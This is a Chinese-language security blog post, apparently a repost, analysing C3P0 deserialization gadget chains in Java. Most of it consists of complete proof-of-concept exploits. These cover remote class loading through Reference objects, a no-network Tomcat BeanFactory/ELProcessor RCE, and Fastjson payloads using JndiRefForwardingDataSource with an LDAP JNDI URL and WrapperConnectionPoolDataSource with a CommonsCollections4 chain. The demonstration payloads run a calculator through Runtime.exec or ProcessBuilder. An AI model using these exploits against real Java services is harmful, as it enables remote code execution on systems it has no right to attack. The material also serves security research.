Java安全中C3P0反序列化在各个链子中的利用手法

luozhenni

​
Java安全中C3P0反序列化在各个链子中的利用手法(不出网/fastjson等等)
原文链接：Java安全中C3P0反序列化在各个链子中的利用手法
LeeH 衡阳信安 2022-11-28 19:00 发表于湖南
简介
c3p0是用于创建和管理连接，利用“池”的方式复用连接减少资源开销，和其他数据源一样，也具有连接数控制、连接可靠性测试、连接泄露控制、缓存语句等功能。目前，hibernate自带的连接池就是c3p0。
ysoserial之URLClassLoader链分析
利用链分析
利用链
* com.sun.jndi.rmi.registry.RegistryContext->lookup
* com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
* com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject
查看com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase类源码
实现有Serializable接口，且具有PropertyChangeSupport和VetoableChangeSupport对象，是的具有监听器的功能
跟进PoolBackedDataSourceBase#writeObject方法

​

编辑
会保存他的成员变量connectionPoolDataSource，但是如果他本身不是一个可以序列化的对象，就会先执行indirector.indirectForm方法之后进行序列化
跟进indirectForm

​

编辑
他会首先调用connectionPoolDataSource的getReference方法得到Reference对象，之后再使用ReferenceIndirector.ReferenceSerialized对象进行包装之后返回一个IndirectlySerialized
这里的ReferenceSerialized是ReferenceIndirector类里面的一个内置类
之后在进行反序列化的时候，跟进PoolBackedDataSourceBase#readObject

​

编辑
他会首先调用connectionPoolDataSource的getReference方法得到Reference对象，之后再使用ReferenceIndirector.ReferenceSerialized对象进行包装之后返回一个IndirectlySerialized
这里的ReferenceSerialized是ReferenceIndirector类里面的一个内置类
之后在进行反序列化的时候，跟进PoolBackedDataSourceBase#readObject

​

编辑
会调用IndirectlySerialized#getObject方法还原对象

​

编辑
这个IndirectlySerialized是一个接口，而ReferenceIndirector.ReferenceSerialized实现了这个接口，并重写了getObject方法

​

编辑
所以就是调用的这个getObject方法，跟进

​

编辑
虽然这里具有一个lookup，但是这里的contextName是不可控的，所以触发点不在这里
后面的return语句中调用了ReferenceableUtils.referenceToObject方法，跟进

​

编辑
他从Reference对象中取出了classFactory和classFactoryLocation属性然后进行URLClassLoader进行加载并实例化，这样一个完整的利用链就形成了
POC编写
构造一个不可序列化的并且实现了Referenceable的ConnectionPoolDataSource对象, 其getReference方法返回带有恶意类位置的Reference对象

1. import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
   
2. 
   
3. import javax.naming.NamingException;
   
4. import javax.naming.Reference;
   
5. import javax.naming.Referenceable;
   
6. import javax.sql.ConnectionPoolDataSource;
   
7. import javax.sql.PooledConnection;
   
8. import java.io.*;
   
9. import java.lang.reflect.Constructor;
   
10. import java.lang.reflect.Field;
    
11. import java.sql.SQLException;
    
12. import java.sql.SQLFeatureNotSupportedException;
    
13. import java.util.Base64;
    
14. import java.util.logging.Logger;
    
15. 
    
16. public class c3p0_POC {
    
17.     private static class ConnectionPool implements ConnectionPoolDataSource , Referenceable{
    
18. 
    
19.         protected String classFactory = null;
    
20. 
    
21.         protected String classFactoryLocation = null;
    
22. 
    
23.         public ConnectionPool(String classFactory,String classFactoryLocation){
    
24.             this.classFactory = classFactory;
    
25.             this.classFactoryLocation = classFactoryLocation;
    
26.         }
    
27.         @Override
    
28.         public Reference getReference() throws NamingException {
    
29.             return new Reference("ref",classFactory,classFactoryLocation);
    
30.         }
    
31. 
    
32.         @Override
    
33.         public PooledConnection getPooledConnection() throws SQLException {
    
34.             return null;
    
35.         }
    
36. 
    
37.         @Override
    
38.         public PooledConnection getPooledConnection(String user, String password) throws SQLException {
    
39.             return null;
    
40.         }
    
41. 
    
42.         @Override
    
43.         public PrintWriter getLogWriter() throws SQLException {
    
44.             return null;
    
45.         }
    
46. 
    
47.         @Override
    
48.         public void setLogWriter(PrintWriter out) throws SQLException {
    
49. 
    
50.         }
    
51. 
    
52.         @Override
    
53.         public void setLoginTimeout(int seconds) throws SQLException {
    
54. 
    
55.         }
    
56. 
    
57.         @Override
    
58.         public int getLoginTimeout() throws SQLException {
    
59.             return 0;
    
60.         }
    
61. 
    
62.         @Override
    
63.         public Logger getParentLogger() throws SQLFeatureNotSupportedException {
    
64.             return null;
    
65.         }
    
66.     }
    
67.     public static String serialize(Object obj) throws IOException {
    
68.         ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
    
69.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
    
70.         objectOutputStream.writeObject(obj);
    
71.         byte[] bytes = byteArrayOutputStream.toByteArray();
    
72.         objectOutputStream.close();
    
73.         return Base64.getEncoder().encodeToString(bytes);
    
74.     }
    
75.     public static void unserialize(String exp) throws IOException, ClassNotFoundException {
    
76.         byte[] decode = Base64.getDecoder().decode(exp);
    
77.         ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(decode);
    
78.         ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
    
79.         objectInputStream.readObject();
    
80.     }
    
81.     public static void main(String[] args) throws Exception{
    
82. 
    
83.         Constructor constructor = Class.forName("com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase").getDeclaredConstructor();
    
84.         constructor.setAccessible(true);
    
85.         PoolBackedDataSourceBase obj = (PoolBackedDataSourceBase) constructor.newInstance();
    
86. 
    
87.         ConnectionPool connectionPool = new ConnectionPool("EvilObject","http://127.0.0.1:8888/");
    
88.         Field field = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource");
    
89.         field.setAccessible(true);
    
90.         field.set(obj, connectionPool);
    
91. 
    
92.         String serialize = serialize(obj);
    
93.         System.out.println(serialize);
    
94.         unserialize(serialize);
    
95.     }
    
96. }

复制代码

这里主要是重写那个getReference方法

​

编辑
成功触发计算器
BeanFactory不出网RCE

​

编辑
在加载类的逻辑中，如果Reference对象的classFactoryLocation为null的时候，就不会加载远程字节码，而是直接加载本地字节码
所以我们就需要一个实现了ObjectFactory接口的，并调用他的getObjectInstance方法
在JNDI注入中，在高版本的java中出现了trustCodebaseURL的限制，导致不能远程加载字节码，但是有着绕过高版本的方法
在JNDI中如果进行looup操作的时候，会动态的加载并实例化Factory类，并且调用factory.getObjectInstance()方法获取远程对象实例，攻击者可以在Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码，达到RCE的效果
文中使用了org.apache.naming.factory.BeanFactory类+javax.el.ELProcessor#eval执行任意el表达式
POC

1. import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
   
2. import org.apache.naming.ResourceRef;
   
3. import javax.naming.NamingException;
   
4. import javax.naming.Reference;
   
5. import javax.naming.Referenceable;
   
6. import javax.naming.StringRefAddr;
   
7. import javax.sql.ConnectionPoolDataSource;
   
8. import javax.sql.PooledConnection;
   
9. import java.io.ByteArrayInputStream;
   
10. import java.io.ByteArrayOutputStream;
    
11. import java.io.ObjectInputStream;
    
12. import java.io.ObjectOutputStream;
    
13. import java.lang.reflect.Field;
    
14. import java.sql.SQLException;
    
15. import java.sql.SQLFeatureNotSupportedException;
    
16. import java.util.Base64;
    
17. import java.util.logging.Logger;
    
18. 
    
19. public class c3p0_no_network {
    
20. 
    
21.     public static String serialize(Object obj) throws Exception {
    
22. 
    
23.         ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
    
24.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
    
25.         objectOutputStream.writeObject(obj);
    
26.         byte[] expCode = byteArrayOutputStream.toByteArray();
    
27.         objectOutputStream.close();
    
28.         return Base64.getEncoder().encodeToString(expCode);
    
29.     }
    
30. 
    
31.     public static void unserialize(String expBase64) throws Exception {
    
32. 
    
33.         byte[] bytes = Base64.getDecoder().decode(expBase64);
    
34.         ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
    
35.         ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
    
36.         objectInputStream.readObject();
    
37.     }
    
38. 
    
39.     private static class NotSerializable implements ConnectionPoolDataSource, Referenceable {
    
40. 
    
41.         private String classFactory;
    
42.         private String classFactoryLocation;
    
43. 
    
44.         public NotSerializable() {
    
45. 
    
46.             this.classFactory = "BeanFactory";
    
47.             this.classFactoryLocation = null;
    
48.         }
    
49. 
    
50.         public NotSerializable(String classFactory, String classFactoryLocation) {
    
51. 
    
52.             this.classFactory = classFactory;
    
53.             this.classFactoryLocation = classFactoryLocation;
    
54.         }
    
55. 
    
56.         @Override
    
57.         public Reference getReference() throws NamingException {
    
58. 
    
59.             ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
    
60.             //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
    
61.             ref.add(new StringRefAddr("forceString", "x=eval"));
    
62.             //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
    
63.             ref.add(new StringRefAddr("x", """.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','"open -a Calculator"']).start()")"));
    
64. 
    
65.             return ref;
    
66.         }
    
67. 
    
68.         @Override
    
69.         public PooledConnection getPooledConnection() throws SQLException {
    
70.             return null;
    
71.         }
    
72. 
    
73.         @Override
    
74.         public PooledConnection getPooledConnection(String user, String password) throws SQLException {
    
75.             return null;
    
76.         }
    
77. 
    
78.         @Override
    
79.         public java.io.PrintWriter getLogWriter() throws SQLException {
    
80.             return null;
    
81.         }
    
82. 
    
83.         @Override
    
84.         public int getLoginTimeout() throws SQLException {
    
85.             return 0;
    
86.         }
    
87. 
    
88.         @Override
    
89.         public void setLogWriter(java.io.PrintWriter out) throws SQLException {
    
90.         }
    
91. 
    
92.         @Override
    
93.         public void setLoginTimeout(int seconds) throws SQLException {
    
94.         }
    
95. 
    
96.         @Override
    
97.         public Logger getParentLogger() throws SQLFeatureNotSupportedException {
    
98.             return null;
    
99.         }
    
100.     }
     
101. 
     
102.     public static void main(String[] args) throws Exception {
     
103. 
     
104.         PoolBackedDataSourceBase poolBackedDataSourceBase = new PoolBackedDataSourceBase(false);
     
105.         ConnectionPoolDataSource connectionPoolDataSource1 = new NotSerializable();
     
106.         Field field = poolBackedDataSourceBase.getClass().getDeclaredField("connectionPoolDataSource");
     
107.         field.setAccessible(true);
     
108.         field.set(poolBackedDataSourceBase, connectionPoolDataSource1);
     
109. 
     
110.         String serializeData = serialize(poolBackedDataSourceBase);
     
111.         System.out.println(serializeData);
     
112.         unserialize(serializeData);
     
113.     }
     
114. }

复制代码

条件

需要tomcat8下的依赖
除了使用EL表达式也有其他利用
org.apache.naming.factory.BeanFactory + groovy
org.apache.naming.factory.BeanFactory + SnakeYaml
org.apache.naming.factory.BeanFactory + XStream
Fastjson中的JndiRefForwardingDataSource类利用
分析

​

编辑
在其中的dereference方法中存在一个lookup，如果这个jndiName可控就会导致JNDI注入
虽然在JndiRefForwardingDataSource类中，并没有对应的setter，但是这个类继承了JndiRefDataSourceBase类，在这个类中存在有setter方法

​

编辑
这样，这个jndiName就可以控制了

​

编辑
在inner方法中存在dereference的调用，寻找setter方法

​

编辑
这两个setter都调用了inner方法，但是因为setLogWriter的参数是PrintWriter对象，我们选择简单的int类型参数的setLoginTimeout方法
构建POC

1. import com.alibaba.fastjson.JSON;
   
2. 
   
3. public class c3p0_fastjson {
   
4.     public static void main(String[] args){
   
5.         String poc = "{"@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource",\n"+""jndiName": "ldap://127.0.0.1:1389/fvtvuj",\n"+""loginTimeout": 0}";
   
6.         JSON.parseObject(poc);
   
7.     }
   
8. }

复制代码

Fastjson之WrapperConnectionPoolDataSource类不出网利用分析
这里主要是使用的是WrapperConnectionPoolDataSourece类，跟进

​

编辑
这个类在初始化的时候，就调用了setUpPropertyListeners方法开启了属性监听功能

​

编辑
这里的VetoableChangeListener就是一个监听器，在属性改变的时候就会调用监听器的VetoableChange的方法，这里就创建了一个监听器，而且重写了vetoableChange方法
后面通过调用addVetoableChangeListener，将监听器添加到自己的属性vcs

​

编辑
那这个vcs属性又是什么呢，是VetoableChangeSupport，这个就是一个监听器的列表，并且会向监听器列表发送 PropertyChangeEvent ，来跟踪属性的更改情况。

​

编辑
在设置属性时，为了监控属性的变化，就会去调用vcs.fireVetoableChange 方法，此方法有很多重载，但最后都会封装一个PropertyChangeEvent 对象

​

编辑
传递给了监听器的vetoableChange方法
来看看重新的vetoableChange方法的逻辑

​

编辑
他只监听两个属性connectionTesterClassName和userOverridesAsString
第一个属性不能利用
第二个属性userOverridesAsString：
会调用C3P0ImplUtils.parseUserOverridesAsString处理新的属性值，跟进细节

​

编辑
截取了HexAsciiSerializedMap后的第二个字符到倒数第二个字符的hex串
之后通过调用fromHexAscii方法将hex转化为序列化字节，再通过调用了SerializableUtils.fromByteArray方法处理序列化字节

​

编辑
调用了deserializeFromByteArray进行反序列化，如果这里是一个恶意的字节码，就会进行恶意触发漏洞
所以现在我们就需要userOverridesAsString的setter方法，就会调用这个链子
在WrapperConnectionPoolDataSource类中是没有这个方法的，但是他继承了WrapperConnectionPoolDataSourceBase类

​

编辑
这个类具有对应的setter方法
编写POC

1. import com.alibaba.fastjson.JSON;
   
2. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
   
3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
   
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
   
5. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
   
6. import javassist.ClassClassPath;
   
7. import javassist.ClassPool;
   
8. import javassist.CtClass;
   
9. import org.apache.commons.collections4.Transformer;
   
10. import org.apache.commons.collections4.comparators.TransformingComparator;
    
11. import org.apache.commons.collections4.functors.ChainedTransformer;
    
12. import org.apache.commons.collections4.functors.ConstantTransformer;
    
13. import org.apache.commons.collections4.functors.InstantiateTransformer;
    
14. 
    
15. import javax.xml.transform.Templates;
    
16. import java.io.*;
    
17. import java.lang.reflect.Field;
    
18. import java.util.PriorityQueue;
    
19. 
    
20. public class c3p0_fastjson2 {
    
21. 
    
22.     public static Field getField (final Class<?> clazz, final String fieldName ) throws Exception {
    
23.         try {
    
24.             Field field = clazz.getDeclaredField(fieldName);
    
25.             if ( field != null )
    
26.                 field.setAccessible(true);
    
27.             else if ( clazz.getSuperclass() != null )
    
28.                 field = getField(clazz.getSuperclass(), fieldName);
    
29. 
    
30.             return field;
    
31.         }
    
32.         catch ( NoSuchFieldException e ) {
    
33.             if ( !clazz.getSuperclass().equals(Object.class) ) {
    
34.                 return getField(clazz.getSuperclass(), fieldName);
    
35.             }
    
36.             throw e;
    
37.         }
    
38.     }
    
39. 
    
40.     public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
    
41.         final Field field = getField(obj.getClass(), fieldName);
    
42.         field.set(obj, value);
    
43.     }
    
44. 
    
45.     public static PriorityQueue CommonsCollections4() throws Exception {
    
46. 
    
47.         ClassPool pool = ClassPool.getDefault();
    
48.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    
49.         CtClass ctClass = pool.makeClass("c3p0Exploit");
    
50.         ctClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
    
51.         String shell = "java.lang.Runtime.getRuntime().exec("calc");";
    
52.         ctClass.makeClassInitializer().insertBefore(shell);
    
53. 
    
54.         byte[] shellCode = ctClass.toBytecode();
    
55.         byte[][] targetCode = new byte[][]{shellCode};
    
56. 
    
57.         TemplatesImpl templatesImpl = new TemplatesImpl();
    
58.         setFieldValue(templatesImpl, "_name", "xx");
    
59.         setFieldValue(templatesImpl, "_bytecodes", targetCode);
    
60.         setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl());
    
61. 
    
62.         Transformer[] transformers = new Transformer[] {
    
63.             new ConstantTransformer(TrAXFilter.class),
    
64.             new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
    
65.         };
    
66.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    
67.         TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
    
68. 
    
69.         PriorityQueue priorityQueue = new PriorityQueue(2);
    
70.         priorityQueue.add(1);
    
71.         priorityQueue.add(2);
    
72.         Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
    
73.         field.setAccessible(true);
    
74.         field.set(priorityQueue, transformingComparator);
    
75. 
    
76.         return priorityQueue;
    
77.     }
    
78. 
    
79.     public static byte[] toByteArray(InputStream in) throws Exception {
    
80.         byte[] classBytes;
    
81.         classBytes = new byte[in.available()];
    
82.         in.read(classBytes);
    
83.         in.close();
    
84.         return classBytes;
    
85.     }
    
86. 
    
87.     public static String bytesToHexString(byte[] bArray, int length) {
    
88.         StringBuffer sb = new StringBuffer(length);
    
89. 
    
90.         for(int i = 0; i < length; ++i) {
    
91.             String sTemp = Integer.toHexString(255 & bArray[i]);
    
92.             if (sTemp.length() < 2) {
    
93.                 sb.append(0);
    
94.             }
    
95. 
    
96.             sb.append(sTemp.toUpperCase());
    
97.         }
    
98.         return sb.toString();
    
99.     }
    
100. 
     
101.     public static void main(String[] args) throws Exception {
     
102. 
     
103.         PriorityQueue queue = CommonsCollections4();
     
104. 
     
105.         ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
     
106.         ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
     
107.         outputStream.writeObject(queue);
     
108.         outputStream.close();
     
109. 
     
110.         byte[] bytes = byteArrayOutputStream.toByteArray();
     
111.         //byte[] bytes = toByteArray(inputStream);
     
112.         String hexString = bytesToHexString(bytes, bytes.length);
     
113. 
     
114.         String poc = "{\n\t"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",\n\t"userOverridesAsString": "HexAsciiSerializedMap:" + hexString + ";"\n}";
     
115.         System.out.println(poc);
     
116.         JSON.parseObject(poc);
     
117.     }
     
118. }

复制代码

​

编辑
这里是使用了cc4版本jar包的cc4链出发计算器

来源：先知社区的【LeeH】师傅







​